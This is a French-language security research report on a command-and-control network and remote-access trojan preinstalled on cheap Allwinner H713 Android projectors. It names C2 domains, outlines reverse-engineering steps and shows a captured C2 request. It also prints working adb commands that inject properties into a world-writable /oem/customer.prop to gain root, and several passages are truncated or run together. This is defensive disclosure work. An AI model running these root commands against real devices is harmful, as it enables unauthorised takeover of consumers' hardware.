
Analyse d'un réseau C2 de beamers chinois - SilentSDK-Analysis
Rapport d'analyse technique — Recherche en sécurité
Appareils concernés : De multiples projecteurs Android de marques de projecteurs comme Nonete (par ex., modèle HY260Pro) (probablement aussi plusieurs projecteurs de Magcubic, Hotack, Huyukang et bien d'autres, car ces entreprises distribuent des modèles similaires et des indications le confirment)
Plateforme de chipset : Allwinner H713 / sun50iw12p1 — potentiellement affecte tous les appareils de cette plateforme
Période d'analyse : 11–17 avril 2026
Classification : Infrastructure de commande et de contrôle pré-installée avec charge utile de cheval de Troie d'accès à distance
api.pixelpioneerss.com), extrait des identifiants d'appareil sensibles, et peut télécharger et exécuter à tout moment du code malveillant supplémentaire arbitraire avec les privilèges root (chmod 777). De plus, les appareils présentent des backdoors root ouvertes.*.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) doivent être bloqués au niveau réseau. Les utilisateurs concernés ne peuvent désactiver manuellement les applications malveillantes que via ADB, car elles sont profondément intégrées dans le système.L'infrastructure malveillante documentée dans ce rapport est pré-installée sur des projecteurs Android actuellement vendus en grande quantité aux consommateurs finaux sur Amazon, eBay et AliExpress. Les appareils concernés couvrent peut-être plusieurs noms de marque (Hotack, Huyukang, Magcubic, Nonete, entre autres). Une infrastructure C2 identique a été confirmée indépendamment sur d'autres appareils du même fabricant (voir section 13). Le schéma correspond aux cas BADBOX.
Appareil acheté : Lien Amazon - Nonete Mini Beamer 4K 1080P
| Propriété | Valeur |
|---|---|
| Nom de marque | Nonete HY260Pro (modèle vendu par plusieurs entreprises) |
| Nom du modèle interne | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32 bits) |
| Système d'exploitation | SpectraOS (Android 11, noyau 5.4.99) |
| Empreinte de build réelle | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| Empreinte de build usurpée | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissif (aucune application) |
| Clé de signature de plateforme | Clé de test publique AOSP |
| Certificat OEM | CN=蓝鲨, OU=www.bsh.me, C=CN |
| Canal du firmware | HY260Pro_SpectraOS_TPYB |
Remarque sur la portée : Le chipset Allwinner H713 est intégré dans de nombreux projecteurs Android bon marché vendus sous des noms de marque changeants sur le marché européen. La base de firmware identique (h713_tuna_p3) et l'opérateur C2 identique (Shenzhen Aodin Technology) suggèrent fortement que tous les appareils de cet OEM contiennent la même infrastructure.
| Étape | Action | Résultat |
|---|---|---|
| 1 | Capture du trafic réseau avec Wireshark | Trafic HTTP vers store-api.aodintech.com |
| 2 | Décodage de la réponse C2 compressée en gzip | 7 applications, dont « SilentTools » cachée |
| 3 | Déchiffrement AES-CBC du chemin de téléchargement | Clé [REDACTED], URL vers fichier .bpp |
| 4 | Exploitation root via /oem/customer.prop | uid=0(root) après injection de propriété |
| 5 | Extraction forensique de /data, /oem, /system | APK, bases de données, configurations |
| 6 | Analyse statique du DEX de StoreOS | pm install -r -d, protection par inversion d'octets |
| 7 | Rétro-ingénierie du mécanisme reverseLen | Compréhension de la protection anti-analyse |
| 8 | Contournement de la protection par inversion d'octets | DEX SilentSDK déchiffré et analysable |
| 9 | Déchiffrement XOR des chaînes de SilentSDK | Domaine C2 api.pixelpioneerss.com confirmé |
| 10 | Vérification de hachage sur trois sources | MD5/SHA-256 correspondent parfaitement |
| 11 | Rétro-ingénierie du processus de téléchargement du malware | Serveurs toujours en ligne |
| 12 | Rétro-ingénierie du malware | Framework RAT basé sur des plugins |
L'accès root a été obtenu grâce à une combinaison de trois vulnérabilités :
/oem accessible en écriture mondiale — La partition est montée en FAT avec fmask=0000.customer.prop chargé au démarrage — Écrase les propriétés système.```bash
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writableadb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root adb shell id
**Impact :** Tout utilisateur ayant un accès physique ou un attaquant sur le même réseau (via ADB, port 5555 ouvert, sans authentification) obtient un accès root complet.
---
## 4. Réponse du serveur C2 — Preuve principale
### Requête HTTP capturée```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
La réponse compressée en gzip contient une liste JSON de sept applications. Six d'entre elles sont des applications de streaming classiques (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). La septième est SilentTools :